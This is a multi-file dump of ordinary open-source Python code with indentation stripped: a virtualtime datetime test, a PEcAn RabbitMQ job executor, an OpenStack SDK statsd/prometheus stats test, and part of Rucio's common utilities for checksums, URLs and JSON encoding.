offsets = msg_dict['offsets']
positions = msg_dict['positions']
while "stop" not in msg_dict:
notify_event.wait()
offsets.append(virtualtime._time_offset)
position = positions.pop(0) if positions else ""
if position == "start_job":
virtualtime.delay_fast_forward_until_set(delay_event)
virtualtime._original_sleep(0.1)
delay_event.set()
notify_event.clear()
@restore_time_after
def test_fast_forward_delay(self):
"""Test that fast forwarding the time works properly"""
notify_event = threading.Event()
virtualtime.notify_on_change(notify_event)
delay_event = threading.Event()
offsets = []
positions = ["start_job", ""]
msg_dict = {'offsets': offsets, 'positions': positions}
catcher_thread = threading.Thread(target=self.fast_forward_delayer, args=(notify_event, delay_event, msg_dict))
catcher_thread.start()
start_time = virtualtime._original_time()
virtualtime.fast_forward_time(2)
assert virtualtime._time_offset == 2
virtualtime.restore_time()
msg_dict['stop'] = True
notify_event.set()
catcher_thread.join()
completion_time = virtualtime._original_time()
assert offsets[:3] == [1.0, 2.0, 0]
# depends on how long the stop event takes?
assert (not offsets[3:]) or offsets[3:] == [0]
assert completion_time - start_time < 0.2
assert delay_event.is_set()
class TestInheritance(object):
"""Tests how detection of inheritance works for datetime classes"""
def setup_method(self, method): # This is a wrapper of setUp for py.test (py.test and nose take different method setup methods)
"""Ensure that virtualtime is disabled when starting each test"""
self.setUp()
def setUp(self):
while virtualtime.enabled():
virtualtime.disable()
def teardown_method(self, method): # This is a wrapper of tearDown for py.test (py.test and nose take different method setup methods)
self.tearDown()
def tearDown(self):
"""Ensure that virtualtime is disabled after running each test"""
while virtualtime.enabled():
virtualtime.disable()
def test_disabled(self):
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
def test_enabled(self):
virtualtime.enable()
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
def test_switching(self):
orig_datetime = datetime.datetime
class derived_datetime(datetime.datetime):
pass
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
virtualtime.enable()
class derived_datetime2(datetime.datetime):
pass
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
assert issubclass(derived_datetime2, orig_datetime)
assert issubclass(derived_datetime2, datetime.datetime)
virtualtime.disable()
assert issubclass(datetime_tz.datetime_tz, orig_datetime)
assert issubclass(datetime_tz.datetime_tz, datetime.datetime)
assert issubclass(derived_datetime, orig_datetime)
assert issubclass(derived_datetime, datetime.datetime)
assert issubclass(derived_datetime2, orig_datetime)
assert issubclass(derived_datetime2, datetime.datetime)
def test_switching_values(self):
now = datetime_tz.datetime_tz.now()
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime_tz.datetime_tz)
later = now + datetime.timedelta(hours=1)
assert isinstance(later, datetime.datetime)
assert isinstance(later, datetime_tz.datetime_tz)
start = datetime.datetime.combine(now.date(), now.time())
assert isinstance(start, datetime.datetime)
local_start = datetime_tz.localize(start)
assert local_start == now
assert isinstance(local_start, datetime_tz.datetime_tz)
start_tz = datetime_tz.datetime_tz.combine(now.date(), now.time(), datetime_tz.localtz())
assert isinstance(start_tz, datetime_tz.datetime_tz)
local_start_tz = datetime_tz.localize(start_tz)
assert local_start_tz == now
assert isinstance(local_start_tz, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.min, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.max, datetime_tz.datetime_tz)
virtualtime.enable()
now = datetime_tz.datetime_tz.now()
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime_tz.datetime_tz)
later = now + datetime.timedelta(hours=1)
assert isinstance(later, datetime.datetime)
assert isinstance(later, datetime_tz.datetime_tz)
start = datetime.datetime.combine(now.date(), now.time())
assert isinstance(start, datetime.datetime)
local_start = datetime_tz.localize(start)
assert local_start == now
assert isinstance(local_start, datetime_tz.datetime_tz)
start_tz = datetime_tz.datetime_tz.combine(now.date(), now.time(), datetime_tz.localtz())
assert isinstance(start_tz, datetime_tz.datetime_tz)
local_start_tz = datetime_tz.localize(start_tz)
assert local_start_tz == now
assert isinstance(local_start_tz, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.min, datetime_tz.datetime_tz)
assert isinstance(datetime_tz.datetime_tz.max, datetime_tz.datetime_tz)
_original_datetime_module = virtualtime._original_datetime_module
_original_datetime_type = virtualtime._original_datetime_type
_original_datetime_now = virtualtime._original_datetime_now
_original_datetime_utcnow = virtualtime._original_datetime_utcnow
_time_offset = virtualtime._time_offset
class virtual_datetime_tz_offset(virtualtime.virtual_datetime):
@classmethod
def now(cls, tz=None):
"""Virtualized datetime.datetime.now()"""
return super(virtual_datetime_tz_offset, cls).now()
@classmethod
def utcnow(cls):
"""Virtualized datetime.datetime.utcnow()"""
tz = getattr(datetime.datetime, "localtz_override") or datetime_tz.localtz()
now = super(virtual_datetime_tz_offset, cls).now()
#print now.replace(tzinfo=tz), tz.utcoffset(now.replace(tzinfo=tz))
#print "utcnow", tz.localize(now).utcoffset()
return now - tz.localize(now).utcoffset()
_original_vt_module = datetime.datetime
def patch_vt_module():
"""Patches the datetime module to work on virtual time"""
datetime.datetime.now = virtual_datetime_tz_offset.now
datetime.datetime.utcnow = virtual_datetime_tz_offset.utcnow
def unpatch_vt_module():
"""Restores the datetime module to work on real time"""
datetime.datetime.now = _original_vt_module.now
datetime.datetime.utcnow = _original_vt_module.utcnow
class TestVirtualDatetimeOffset:
def setup(self):
virtualtime.enable()
datetime.datetime.localtz_override = pytz.timezone("America/Chicago")
patch_vt_module()
test_datetime_tz.patch_datetime_module()
def teardown(self):
virtualtime.disable()
datetime.datetime.localtz_override = None
unpatch_vt_module()
test_datetime_tz.unpatch_datetime_module()
def test_offset(self):
"""Make sure the offset is correct when using the localtz override"""
localdatetime = datetime.datetime(2014, 3, 9, 1, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014, 3, 9, 2, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014, 3, 9, 3, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014, 11, 2, 0, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014, 11, 2, 1, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
localdatetime = datetime.datetime(2014, 11, 2, 2, 45, 0)
virtualtime.set_local_datetime(localdatetime)
self.runTests(localdatetime)
#print datetime_tz.datetime_tz.now(), datetime.datetime.now()
#print datetime_tz.datetime_tz.utcnow(), datetime.datetime.utcnow()
def runTests(self, localdatetime):
tz = datetime.datetime.localtz_override
print("now")
assert self.close_enough(datetime.datetime.now(), localdatetime)
utcnow = datetime_tz.datetime_tz.utcnow()
print("utcnow")
assert self.close_enough(utcnow, tz.localize(localdatetime))
now = datetime_tz.datetime_tz.now()
print("_tznow")
assert self.close_enough(now, tz.localize(localdatetime))
def close_enough(self, dt, dt1):
print(dt, "\t", dt1)
return abs(dt - dt1) < datetime.timedelta(seconds=1)
|
executor.py
|
import json
import logging
import os
import socket
import subprocess
import sys
import threading
import time
import uuid
import pika
import shutil
rabbitmq_uri = os.getenv('RABBITMQ_URI', 'amqp://guest:guest@rabbitmq/%2F')
rabbitmq_queue = os.getenv('RABBITMQ_QUEUE', 'pecan')
default_application = os.getenv('APPLICATION', 'job.sh')
class Worker:
def __init__(self, method, properties, body):
self.method = method
self.properties = properties
self.body = body
self.finished = False
def runfunc(self):
logging.debug(self.body)
jbody = json.loads(self.body.decode('UTF-8'))
folder = jbody.get('folder')
rebuild = jbody.get('rebuild')
pecan_xml = jbody.get('pecan_xml')
custom_application = jbody.get('custom_application')
if rebuild is not None:
logging.info("Rebuilding PEcAn with make")
application = 'make'
folder = '/pecan'
elif pecan_xml is not None:
# Passed entire pecan XML as a string
logging.info("Running XML passed directly")
try:
os.mkdir(folder)
except OSError as e:
logging.info("Caught the following OSError. ",
"If it's just that the directory exists, ",
"this can probably be ignored: ", e)
workflow_path = os.path.join(folder, "workflow.R")
shutil.copyfile("/work/workflow.R", workflow_path)
xml_file = open(os.path.join(folder, "pecan.xml"), "w")
xml_file.write(pecan_xml)
xml_file.close()
# Set variables for execution
application = "R CMD BATCH workflow.R"
elif custom_application is not None:
application = custom_application
else:
logging.info("Running default command: %s" % default_application)
application = default_application
logging.info("Running command: %s" % application)
logging.info("Starting command in directory %s." % folder)
try:
output = subprocess.check_output(application, stderr=subprocess.STDOUT, shell=True, cwd=folder)
status = 'OK'
except subprocess.CalledProcessError as e:
logging.exception("Error running job.")
output = e.output
status = 'ERROR'
except Exception as e:
logging.exception("Error running job.")
output = str(e)
status = 'ERROR'
logging.info("Finished running job with status " + status)
logging.info(output)
try:
with open(os.path.join(folder, 'rabbitmq.out'), 'w') as out:
out.write(str(output) + "\n")
out.write(status + "\n")
except Exception:
logging.exception("Error writing status.")
# done processing, set finished to true
self.finished = True
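# A hypothetical example of the JSON message body runfunc() consumes; only the
# keys read above (folder, rebuild, pecan_xml, custom_application) are
# meaningful, and all but folder are optional:
#
#     {"folder": "/data/workflows/run-1",
#      "custom_application": "bash my_job.sh"}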
# called for every message, this will start the program and ack message if all is ok.
def callback(ch, method, properties, body):
global worker
# do not pass channel, pika is not threadsafe, only receiver is allowed to use channel
worker = Worker(method, properties, body)
thread = threading.Thread(target=worker.runfunc)
thread.start()
# connect to rabbitmq and receive jobs, only this function can use the channel.
def receiver():
global worker
# create connection to rabbitmq
connection = pika.BlockingConnection(pika.URLParameters(rabbitmq_uri))
channel = connection.channel()
# make sure queue exists
channel.queue_declare(queue=rabbitmq_queue, durable=True)
# receive 1 message at a time, call callback function
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback, queue=rabbitmq_queue)
# receive messages
worker = None
logging.info('[*] Waiting for messages. To exit press CTRL+C')
try:
while True:
# use polling to allow for heartbeats, the actual work is done
# in another thread which should not talk in channel!
channel.connection.process_data_events(time_limit=1) # 1 second
if worker and worker.finished:
channel.basic_ack(delivery_tag=worker.method.delivery_tag)
worker = None
except KeyboardInterrupt:
pass
finally:
connection.close()
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s',
level=logging.INFO)
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
# start listening for new jobs
receiver()
|
test_stats.py
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2014 OpenStack Foundation
# Copyright 2018 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import pprint
import threading
import time
import select
import socket
import fixtures
import prometheus_client
import testtools.content
from openstack.tests.unit import base
class StatsdFixture(fixtures.Fixture):
def _setUp(self):
self.running = True
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('', 0))
self.port = self.sock.getsockname()[1]
self.wake_read, self.wake_write = os.pipe()
self.stats = []
self.thread.start()
self.addCleanup(self._cleanup)
def run(self):
while self.running:
poll = select.poll()
poll.register(self.sock, select.POLLIN)
poll.register(self.wake_read, select.POLLIN)
ret = poll.poll()
for (fd, event) in ret:
if fd == self.sock.fileno():
data = self.sock.recvfrom(1024)
if not data:
return
self.stats.append(data[0])
if fd == self.wake_read:
return
def _cleanup(self):
self.running = False
os.write(self.wake_write, b'1\n')
self.thread.join()
class TestStats(base.TestCase):
def setUp(self):
self.statsd = StatsdFixture()
self.useFixture(self.statsd)
# note, use 127.0.0.1 rather than localhost to avoid getting ipv6
# see: https://github.com/jsocol/pystatsd/issues/61
self.useFixture(
fixtures.EnvironmentVariable('STATSD_HOST', '127.0.0.1'))
self.useFixture(
fixtures.EnvironmentVariable('STATSD_PORT', str(self.statsd.port)))
self.add_info_on_exception('statsd_content', self.statsd.stats)
# Set up the above things before the super setup so that we have the
# environment variables set when the Connection is created.
super(TestStats, self).setUp()
self._registry = prometheus_client.CollectorRegistry()
self.cloud.config._collector_registry = self._registry
self.addOnException(self._add_prometheus_samples)
def _add_prometheus_samples(self, exc_info):
samples = []
for metric in self._registry.collect():
for s in metric.samples:
samples.append(s)
self.addDetail(
'prometheus_samples',
testtools.content.text_content(pprint.pformat(samples)))
def assert_reported_stat(self, key, value=None, kind=None):
"""Check statsd output
Check statsd return values. A ``value`` should specify a
``kind``, however a ``kind`` may be specified without a
``value`` for a generic match. Leave both empty to just check
for key presence.
:arg str key: The statsd key
:arg str value: The expected value of the metric ``key``
:arg str kind: The expected type of the metric ``key`` For example
- ``c`` counter
- ``g`` gauge
- ``ms`` timing
- ``s`` set
"""
self.assertIsNotNone(self.statsd)
if value:
self.assertNotEqual(kind, None)
start = time.time()
while time.time() < (start + 1):
# Note our fake statsd just queues up results in a queue.
# We just keep going through them until we find one that
# matches, or fail out. If statsd pipelines are used,
# large single packets are sent with stats separated by
# newlines; thus we first flatten the stats out into
# single entries.
stats = itertools.chain.from_iterable(
[s.decode('utf-8').split('\n') for s in self.statsd.stats])
for stat in stats:
k, v = stat.split(':')
if key == k:
if kind is None:
# key with no qualifiers is found
return True
s_value, s_kind = v.split('|')
# if no kind match, look for other keys
if kind != s_kind:
continue
if value:
# special-case value|ms because statsd can turn
# timing results into float of indeterminate
# length, hence foiling string matching.
if kind == 'ms':
if float(value) == float(s_value):
return True
if value == s_value:
return True
# otherwise keep looking for other matches
continue
# this key matches
return True
time.sleep(0.1)
raise Exception("Key %s not found in reported stats" % key)
def assert_prometheus_stat(self, name, value, labels=None):
sample_value = self._registry.get_sample_value(name, labels)
self.assertEqual(sample_value, value)
def test_list_projects(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
self.cloud.list_projects()
self.assert_calls()
self.assert_reported_stat(
'openstack.api.identity.GET.projects', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='identity',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_projects(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
list(self.cloud.identity.projects())
self.assert_calls()
self.assert_reported_stat(
'openstack.api.identity.GET.projects', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='identity',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_servers(self):
mock_uri = 'https://compute.example.com/v2.1/servers/detail'
self.register_uris([
self.get_nova_discovery_mock_dict(),
dict(method='GET', uri=mock_uri, status_code=200,
json={'servers': []})])
list(self.cloud.compute.servers())
self.assert_calls()
self.assert_reported_stat(
'openstack.api.compute.GET.servers.detail', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='compute',
endpoint=mock_uri,
method='GET',
status_code='200'))
def test_servers_no_detail(self):
mock_uri = 'https://compute.example.com/v2.1/servers'
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'servers': []})])
self.cloud.compute.get('/servers')
self.assert_calls()
self.assert_reported_stat(
'openstack.api.compute.GET.servers', value='1', kind='c')
self.assert_prometheus_stat(
'openstack_http_requests_total', 1, dict(
service_type='compute',
endpoint=mock_uri,
method='GET',
status_code='200'))
class TestNoStats(base.TestCase):
def setUp(self):
super(TestNoStats, self).setUp()
self.statsd = StatsdFixture()
self.useFixture(self.statsd)
def test_no_stats(self):
mock_uri = self.get_mock_url(
service_type='identity', resource='projects',
base_url_append='v3')
self.register_uris([
dict(method='GET', uri=mock_uri, status_code=200,
json={'projects': []})])
self.cloud.identity._statsd_client = None
list(self.cloud.identity.projects())
self.assert_calls()
self.assertEqual([], self.statsd.stats)
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2021
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2021
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Success.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope": "scope", "name": "name"}
:returns: list of dictionaries {"scope": "scope", "name": "name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
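# A small illustration (hypothetical DIDs) of the accepted input mix:
#
#     dids_as_dicts(["user.jdoe:file1", {"scope": "user.jdoe", "name": "file2"}])
#     -> [{"scope": "user.jdoe", "name": "file1"},
#         {"scope": "user.jdoe", "name": "file2"}]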
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
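# Example with a hypothetical host, showing the doseq behaviour: each element
# of a sequence value becomes its own key=value pair.
#
#     build_url('https://rucio.example.com', path='dids', params={'name': ['a', 'b']}, doseq=True)
#     -> 'https://rucio.example.com/dids?name=a&name=b'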
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
Returns False otherwise. audience and scope must both be strings
or both be lists; similarly for the required_* variables.
If both conditions are satisfied, True is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) # NOQA: W504
and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) # NOQA: W504
and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
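# Two quick illustrations with string inputs and the default separator:
#
#     all_oidc_req_claims_present("openid profile", "rucio", "openid", "rucio")   # True
#     all_oidc_req_claims_present("openid", "rucio", "openid profile", "rucio")   # False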
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
Sets the module-level PREFERRED_CHECKSUM to the given algorithm,
provided it is supported (see is_checksum_valid); otherwise it is a no-op.
:param checksum_name: The name of the checksum algorithm to prefer.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
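# Worked example: with PREFERRED_CHECKSUM == 'adler32', the loop keeps
# overwriting file['checksum'] until the preferred algorithm is reached.
#
#     file = {'metadata': {'md5': 'abc', 'adler32': '062c0215'}}
#     set_checksum_value(file, ['md5', 'adler32'])
#     file['checksum']   # -> 'ADLER32:062c0215'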
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'r+b') as f:
# memory map the file
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
    """
    Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
    :param file: file name
    :returns: string of 64 hexadecimal digits
    """
    with open(file, "rb") as f:
        bytes_ = f.read()  # read entire file as bytes
    return hashlib.sha256(bytes_).hexdigest()
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
    :returns: string of up to 8 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
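# --- Illustrative usage (added sketch, not part of the original module) ---
# Shows how the checksum registry above is meant to be driven: pick a
# preferred algorithm, then look up its callable in CHECKSUM_ALGO_DICT.
# The path argument is hypothetical.
def _example_checksum_usage(path='/tmp/data.bin'):
    set_preferred_checksum('md5')
    algo = CHECKSUM_ALGO_DICT[PREFERRED_CHECKSUM]
    return algo(path)  # hexadecimal digest of the file's content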
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
    """ Converts a list of values into a string of space separated values
    :param vallist: the list of values to convert into string
    :return: the string of space separated values or the value initially passed as parameter
    """
    try:
        if isinstance(vallist, list):
            return text_type(" ".join(vallist))
        else:
            return text_type(vallist)
    except Exception:
        return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
            # should not happen since the only date-like format
            # supported at domain schema level is 'datetime'.
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
